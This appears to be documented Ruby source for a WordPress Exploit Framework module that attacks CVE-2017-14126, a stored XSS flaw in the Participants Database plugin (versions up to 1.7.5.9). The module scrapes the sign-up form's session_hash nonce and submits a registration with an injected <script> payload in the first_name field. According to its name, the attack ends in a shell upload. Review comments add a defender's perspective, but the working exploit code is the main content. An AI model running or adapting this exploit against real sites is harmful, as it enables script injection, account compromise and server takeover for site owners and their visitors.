class Wpxf::Exploit::ParticipantsDatabaseV1759XssShellUpload
Attributes
session_hash[RW]
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 6
# Registers the module metadata and its single required option.
#
# The references tie this module to CVE-2017-14126 / WPVDB 8896, a stored XSS
# issue in Participants Database up to and including 1.7.5.9. The same
# identifiers can be used to look up the advisory.
def initialize
  super

  credited_authors = [
    'Benjamin Lim', # Vulnerability discovery
    'rastating'     # WPXF module
  ]
  advisory_refs = [
    ['CVE', '2017-14126'],
    ['WPVDB', '8896']
  ]

  update_info(
    name: 'Participants Database <= 1.7.5.9 XSS Shell Upload',
    author: credited_authors,
    references: advisory_refs,
    date: 'Sep 06 2017'
  )

  # sign_up_path is supplied by the operator and is joined onto the site URL
  # in sign_up_url; it also appears in the form body sent by store_script.
  sign_up_path_option = StringOption.new(
    name: 'sign_up_path',
    desc: 'The relative path of the Participants Database sign up page',
    required: true
  )
  register_options([sign_up_path_option])
end
Public Instance Methods
before_store()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 48
# Reads the sign-up form's session_hash into the session_hash attribute.
#
# The value comes from fetch_nonce. When it is nil, an error is emitted and
# the method reports failure.
#
# @return [Boolean] false when no session hash was obtained, true otherwise
def before_store
  self.session_hash = fetch_nonce
  return true unless session_hash.nil?

  emit_error 'Failed to retrieve session hash / nonce'
  false
end
check()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 31
# Delegates the version check for the 'participants-database' plugin to
# check_plugin_version_from_readme and returns its result.
#
# NOTE(review): '1.7.5.10' is presumably the first release carrying the fix,
# which is consistent with the "<= 1.7.5.9" in the module name. If so, sites
# at or above that version are in the remediated state. How the comparison is
# made is decided by check_plugin_version_from_readme, which is not shown here.
def check
  plugin_slug = 'participants-database'
  first_fixed_release = '1.7.5.10'
  check_plugin_version_from_readme(plugin_slug, first_fixed_release)
end
fetch_nonce()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 43
# Requests the sign-up page and extracts the hidden session_hash value.
#
# The pattern only accepts a value made of letters and digits
# (case-insensitive), and expects the name, type and value attributes in that
# order.
#
# @return [String, nil] the captured value; nil when there is no response,
#   the status is not 200, or the pattern does not match the body
def fetch_nonce
  response = execute_get_request(url: sign_up_url)
  return nil unless response && response.code == 200

  response.body[/name="session_hash"\s+type="hidden"\s+value="([a-z0-9]+)"/i, 1]
end
sign_up_url()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 39
# Builds the sign-up page URL from the site's full URI and the
# operator-supplied 'sign_up_path' option.
#
# @return the result of normalize_uri (presumably a String; confirm against
#   normalize_uri, which is defined outside this file)
def sign_up_url
  site_root = full_uri
  relative_path = datastore['sign_up_path']
  normalize_uri(site_root, relative_path)
end
store_script()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 59
# Submits the Participants Database sign-up form with a <script> element
# placed in the first_name field.
#
# Defender view: the observable artifact is a POST to the sign-up page with
# 'action' => 'signup' and markup inside first_name. The issue referenced by
# this module (CVE-2017-14126) presumably depends on that field being shown
# later without output encoding; confirm against the advisory.
#
# @return the result of execute_post_request (defined outside this file)
def store_script
  target_url = sign_up_url

  # NOTE(review): the third key is literally 'shortcode_page=' including the
  # trailing '='. It is reproduced as-is; how it is encoded on the wire depends
  # on execute_post_request, which is not shown here.
  signup_form = {
    'action' => 'signup',
    'subsource' => 'participants-database',
    'shortcode_page=' => datastore['sign_up_path'],
    'thanks_page' => datastore['sign_up_path'],
    'instance_index' => '2',
    'pdb_data_keys' => '1.2.9.10',
    # Value captured from the sign-up page by fetch_nonce via before_store.
    'session_hash' => session_hash,
    'first_name' => "<script>#{xss_include_script}</script>#{Wpxf::Utility::Text.rand_alpha(6)}",
    'last_name' => Wpxf::Utility::Text.rand_alpha(6),
    'email' => Wpxf::Utility::Text.rand_email,
    'mailing_list' => 'No',
    'submit_button' => 'Submit'
  }

  execute_post_request(url: target_url, body: signup_form)
end
vulnerable_page()
# File lib/wpxf/modules/exploit/xss/stored/participants_database_v1.7.5.9_stored_xss_shell_upload.rb, line 35
# Returns a fixed description naming the participant list page.
#
# NOTE(review): presumably this is the view on which stored sign-up fields
# are displayed, so it is where output encoding matters. Confirm against the
# caller, which is not shown here.
#
# @return [String]
def vulnerable_page
  page_description = 'the page containing the participant list'
  page_description
end